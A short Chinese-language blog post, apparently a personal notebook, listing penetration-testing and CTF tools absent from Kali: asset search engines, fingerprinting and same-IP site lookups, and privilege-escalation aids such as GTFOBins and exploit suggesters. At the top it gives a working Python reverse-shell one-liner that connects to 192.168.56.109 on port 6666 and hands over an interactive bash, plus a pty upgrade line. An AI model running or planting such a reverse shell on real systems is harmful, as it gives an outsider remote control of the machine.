工具收集

本文记录kali不包含的工具

python -c 'import socket, subprocess, os;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect(("192.168.56.109", 6666));os.dup2(s.fileno(), 0);os.dup2(s.fileno(), 1);os.dup2(s.fileno(), 2);subprocess.call(["/bin/bash", "-i"])'

python -c "import pty;pty.spawn('/bin/bash')"

工具集

https://github.com/truongkma/ctf-tools
https://github.com/zardus/ctf-tools
https://zhuanlan.zhihu.com/p/161544065
https://zhuanlan.zhihu.com/p/53112370
https://zhuanlan.zhihu.com/p/181396480
https://zhuanlan.zhihu.com/p/57802875

在线工具

http://shodan.io
http://zoomeye.org
http://www.fofa.so
https://www.ip138.com 可查历史解析ip
https://detect.secwx.com/

web扫描

https://scan.top15.cn/web/
wappalyzer插件
x-ray https://github.com/chaitin/xray/releases (国产,非开源)被动扫描,简易爬虫

指纹识别

http://www.yunsee.cn/finger.html
http://whatweb.net/
http://whatweb.bugscaner.com/look/

同ip网站查询(旁站)

https://www.webscan.cc/
https://www.chinabaiker.com/cduan.php
https://chapangzhan.com/

提权相关

gtfo py编写,从GTFOBins和LOLBAS上上搜索
GTFOBins:Linux命令提权辅助查询
  https://gtfobins.github.io/
LOLBAS:Windows命令提权辅助查询
  https://lolbas-project.github.io/
BeRoot https://github.com/AlessandroZ/BeRoot 通过查找错误配置win+linux
Vulmap https://github.com/vulmon/Vulmap win+linux
WindowsVulnScan https://github.com/chroblert/WindowsVulnScan 查看已有CVE


很久未更新
Linux_Exploit_Suggester https://github.com/InteliSecureLabs/Linux_Exploit_Suggester 根据uname -r查询已有的exploit
Windows-Exploit-Suggester https://github.com/AonCyberLabs/Windows-Exploit-Suggester python开发,通过systeminfo文件比查找

posted @ 2020-12-19 20:56  某某人8265  阅读(89)  评论(0编辑  收藏  举报